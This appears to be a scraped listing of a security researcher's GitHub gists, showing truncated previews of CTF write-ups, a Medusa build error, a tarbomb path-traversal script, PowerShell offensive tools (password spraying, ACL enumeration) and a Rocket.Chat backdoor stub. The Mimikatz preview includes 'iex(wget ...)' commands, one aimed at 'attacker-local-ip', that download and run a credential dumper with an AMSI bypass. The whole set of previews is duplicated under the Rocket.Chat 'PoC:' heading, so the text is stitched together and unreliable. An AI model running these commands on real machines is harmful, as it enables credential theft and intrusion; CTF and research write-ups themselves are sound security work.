LongCat pich4ya

## intigrity_may22_xss_chall.txt
@author Pichaya (LongCat) Morimoto (p.morimoto@sth.sh)

Challenge: https://challenge-0522.intigriti.io/challenge/challenge.html

จุดประสงค์คือต้องทำ XSS โดยที่มีการป้องกันไว้ด้วย
(1) ไม่ได้รับค่า User Input มาแสดงตรง ๆ รับแค่ Index (ตัวเลข) แล้วไป Lookup Content ที่เป็น HTML มาแสดง
(2) HTML Content (Static แบบ Fixed ไว้) ที่ Lookup มายังจะโดน Sanitize ต่อด้วยฟังก์ชัน filterXSS() จาก lib ชื่อ xss-js

Tech Stack:

## install_medusa_macos.txt
I got this error during `make` for Medusa installation on MacOS 12.4

```bash
git clone https://github.com/jmk-foofus/medusa
cd medusa
./configure
make && make install
[..]
medusa-net.c:349:28: error: implicit declaration of function 'TLS_client_method' is invalid in C99 [-Werror,-Wimplicit-function-declaration]
  sslContext = SSL_CTX_new(TLS_client_method());

## Spiky_Tamagotchy_Writeup.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              2 stars
            
          
                pich4ya
                / Spiky_Tamagotchy_Writeup.md
            
            
              Last active Aug 6, 2022
            
              
                HackTheBox Cyber Apocalypse 2022 Intergalactic Chase - Spiky Tamagotchy Writeup
              
          
      View Spiky_Tamagotchy_Writeup.md
  
      
    info
Captain Spiky comes from a rare species of creatures who can only breathe underwater. During the energy-crisis war, he was captured as a war prisoner and later forced to be a Tamagotchi pet for a child of a general of nomadic tribes. He is forced to react in specific ways and controlled remotely purely for the amusement of the general's children. The Paraman crew needs to save the captain of his misery as he is potentially a great asset for the war against Draeger. Can you hack into the Tamagotchi controller to rescue the captain?

techstack

node.js
express.js
mysql
alpine docker


## Genesis_Wallet_Writeup.txt
# author Pichaya Morimoto (p.morimoto@sth.sh)

Unintened solution.

You create 2 users. Then, do transfer -9999 amount from one account to another.

POST /api/transactions/create HTTP/1.1
[...]
Content-Length: 84

## Acnologia_Portal_Writeup.txt
# author Pichaya Morimoto (p.morimoto@sth.sh)

1. Register and Login
2. Submit Bug Report

Vulns:
- Tar Unzip Path Traversal
- Tar content => Overwrite flask_session's file type


## tarbomb.py
#!/bin/python
# python tarbomb.py `pwd`/__init__.py pwn.tar.gz 10 app/
# Copyright 2020 Andrew Scott
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE

## Find-AclSth.ps1
function Find-AclSth {
<#
.SYNOPSIS

Finds object ACLs in the current (or specified) domain with modification
rights set to non-built in objects.

Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.

Author: Will Schroeder (@harmj0y)

## Invoke-LocalUserSprayAttack.ps1
<#
    Author: Itamar Mizrahi (@MrAnde7son)
    License: GNU v3
    Required Dependencies: None
    Optional Dependencies: None
#>

function Invoke-LocalUserSprayAttack
{
<#

## Invoke-OneShot-Mimikatz.ps1
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)

## rocket_chat_backdoor.txt

@author Pichaya Morimoto (p.morimoto@sth.sh)
Tested on Rocket.Chat 3.16.1

As mentioned in https://blog.sonarsource.com/nosql-injections-in-rocket-chat
"Rocket.Chat has a feature called Integrations that allows creating incoming and outgoing web hooks. These web hooks can have scripts associated with them that are executed when the web hook is triggered."

However, no exact instruction was given. Here we go.

PoC:
	@author Pichaya (LongCat) Morimoto (p.morimoto@sth.sh)

	Challenge: https://challenge-0522.intigriti.io/challenge/challenge.html

	จุดประสงค์คือต้องทำ XSS โดยที่มีการป้องกันไว้ด้วย
	(1) ไม่ได้รับค่า User Input มาแสดงตรง ๆ รับแค่ Index (ตัวเลข) แล้วไป Lookup Content ที่เป็น HTML มาแสดง
	(2) HTML Content (Static แบบ Fixed ไว้) ที่ Lookup มายังจะโดน Sanitize ต่อด้วยฟังก์ชัน filterXSS() จาก lib ชื่อ xss-js

	Tech Stack:
	I got this error during `make` for Medusa installation on MacOS 12.4

	```bash
	git clone https://github.com/jmk-foofus/medusa
	cd medusa
	./configure
	make && make install
	[..]
	medusa-net.c:349:28: error: implicit declaration of function 'TLS_client_method' is invalid in C99 [-Werror,-Wimplicit-function-declaration]
	sslContext = SSL_CTX_new(TLS_client_method());
	# author Pichaya Morimoto (p.morimoto@sth.sh)

	Unintened solution.

	You create 2 users. Then, do transfer -9999 amount from one account to another.

	POST /api/transactions/create HTTP/1.1
	[...]
	Content-Length: 84
	# author Pichaya Morimoto (p.morimoto@sth.sh)

	1. Register and Login
	2. Submit Bug Report

	Vulns:
	- Tar Unzip Path Traversal
	- Tar content => Overwrite flask_session's file type
	#!/bin/python
	# python tarbomb.py `pwd`/__init__.py pwn.tar.gz 10 app/
	# Copyright 2020 Andrew Scott
	# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
	# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
	# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE
	function Find-AclSth {
	<#
	.SYNOPSIS

	Finds object ACLs in the current (or specified) domain with modification
	rights set to non-built in objects.

	Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.

	Author: Will Schroeder (@harmj0y)
	<#
	Author: Itamar Mizrahi (@MrAnde7son)
	License: GNU v3
	Required Dependencies: None
	Optional Dependencies: None
	#>

	function Invoke-LocalUserSprayAttack
	{
	<#
	# TLDR:
	# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
	#
	# @author Pichaya Morimoto (p.morimoto@sth.sh)
	# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
	# (Tested and worked on Windows 10 x64 patched 2022-03-26)
	#
	# Usage:
	# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
	# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)

	@author Pichaya Morimoto (p.morimoto@sth.sh)
	Tested on Rocket.Chat 3.16.1

	As mentioned in https://blog.sonarsource.com/nosql-injections-in-rocket-chat
	"Rocket.Chat has a feature called Integrations that allows creating incoming and outgoing web hooks. These web hooks can have scripts associated with them that are executed when the web hook is triggered."

	However, no exact instruction was given. Here we go.

	PoC: